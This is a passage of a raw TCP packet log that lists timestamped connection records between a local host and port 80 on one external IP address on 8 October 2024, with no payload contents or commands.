Oct 8, 2024 20:47:32.892596960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.892611980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.892631054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.892642021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.892664909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.892677069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.892699003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.892700911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.892733097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.892744064 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.892776966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.892786980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.892818928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.892832994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.892864943 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.892870903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.892904043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.892915010 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.892937899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.892946959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.892972946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.892982960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893006086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893021107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893040895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893052101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893088102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893093109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893120050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893132925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893152952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893166065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893182993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893197060 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893219948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893229008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893258095 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893268108 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893286943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893301964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893321991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893331051 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893357992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893367052 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893403053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893409967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893441916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893455982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893492937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893630981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893663883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893683910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893698931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893708944 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893743992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893753052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893785000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893796921 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893819094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893831968 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893853903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.893862963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.893898964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.973620892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.973643064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.973653078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.973670959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.973681927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.973681927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.973694086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.973706007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.973709106 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.973736048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.973743916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.973814011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.973825932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.973834991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.973867893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.973884106 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.973978043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.973989964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.973999023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.974014044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.974028111 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.974055052 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.974059105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.974069118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.974097967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.974123001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.974628925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.974683046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.974716902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.974734068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.974762917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.974822044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.974853992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.974869013 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.974886894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.974900007 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.974921942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.974934101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.974967003 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.975090981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.975136995 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.975142002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.975177050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.975189924 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.975214958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.975225925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.975249052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.975282907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.975296021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.975327969 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.975332975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.975366116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.975379944 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.975413084 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.975418091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.975462914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.975469112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.975502014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.975507975 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.975533962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.975547075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.975568056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.975579023 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.975600004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.975609064 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.975632906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.975646019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.975682974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.976061106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976105928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.976198912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976207972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976217985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976228952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976238966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.976258993 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.976262093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976272106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976281881 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976281881 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.976293087 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976304054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976309061 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.976335049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.976345062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.976414919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976460934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976463079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.976471901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976480961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976500988 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.976511002 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.976525068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.976653099 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976694107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.976722956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976766109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.976794004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976804018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976814032 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976824045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976836920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.976865053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.976885080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976902008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976911068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.976936102 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.976944923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.977015018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.977025032 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.977035046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.977063894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.977086067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.977106094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.977117062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.977154970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.977200031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.977210045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.977242947 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.977809906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.977863073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.977874041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.977909088 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.977920055 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.977986097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.977997065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.978034973 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.978065968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.978077888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.978106976 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.978128910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.978133917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.978151083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.978163004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.978172064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.978178978 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.978184938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.978207111 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.978218079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.978502989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.978513956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.978523016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.978553057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.978574991 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.979720116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.979731083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.979742050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.979787111 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.979809999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.979825020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.979835987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.979846954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.979867935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.979896069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.979921103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.979932070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.979940891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.979949951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.979959965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.979965925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.979971886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.979991913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.980000973 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.980062962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980072021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980082989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980109930 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.980118990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.980197906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980209112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980217934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980227947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980238914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980246067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.980251074 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980272055 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.980279922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.980303049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.980334044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980345011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980354071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980366945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980376005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.980384111 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.980402946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.980555058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980565071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980575085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980602980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.980612040 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.980680943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980690002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980700016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980722904 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.980742931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980748892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.980755091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980765104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980783939 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.980791092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980796099 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.980802059 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.980817080 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.980838060 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.061042070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061156988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061167002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061177015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061188936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061198950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061213017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061224937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061237097 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.061271906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061280966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061283112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.061290979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061301947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061311960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061319113 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.061323881 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061335087 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061345100 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.061367035 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.061381102 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.061523914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061573982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.061577082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061609030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061626911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.061659098 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.061674118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061707020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061723948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.061741114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061758041 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.061778069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061793089 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.061814070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061829090 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.061846972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061862946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.061899900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.061961889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.061995029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.062014103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.062027931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.062043905 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.062061071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.062077045 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.062094927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.062110901 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.062136889 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.062144041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.062177896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.062194109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.062211990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.062227964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.062244892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.062263012 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.062293053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.062297106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.062330961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.062346935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.062364101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.062381983 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.062397957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.062412977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.062431097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.062449932 CEST	49755	80	192.168.2.5	95.164.90.97
